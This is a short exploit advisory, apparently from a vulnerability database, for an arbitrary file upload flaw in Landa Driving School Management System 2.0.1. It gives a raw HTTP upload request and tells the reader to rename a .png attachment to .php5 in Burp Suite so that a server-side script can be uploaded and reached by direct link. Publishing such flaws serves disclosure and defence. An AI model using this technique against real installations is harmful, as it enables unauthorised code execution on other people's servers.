Tuesday, January 18, 2022

Landa Driving School Management System 2.0.1 Arbitrary File Upload

# Exploit Title: Landa Driving School Management System Arbitrary File Upload
# Version 2.0.1
# Google Dork: N/A
# Date: 17/01/2022
# Exploit Author: Sohel Yousef - [email protected]
# Software Link: https://codecanyon.net/item/landa-driving-school-management-system/23220151
# Software link 2 :https://simcycreative.com/landa/
# Software Demo : https://landa.simcycreative.com/
# Category: webapps

Landa Driving School Management System contain arbitrary file upload
registered user can upload .php5 files in attachments section with use of intercept tool in burbsuite to edit the raw


POST /profile/attachment/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------215084716322124620333137564048
Content-Length: 294983
Origin: https://localhost
Connection: close
Referer: https://localhost/profile/91/
Cookie: CSRF-TOKEN=e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf; simcify=97a4436a6f7c5c5cd1fc43b903e3b760
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Content-Disposition: form-data; name="name"

Content-Disposition: form-data; name="csrf-token"

Content-Disposition: form-data; name="userid"

Content-Disposition: form-data; name="attachment"; filename="w.php.png" >>>>>>>>>>>>>>>> change this to w.php5
Content-Type: image/png

you will have a direct link to the uploaded files


Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore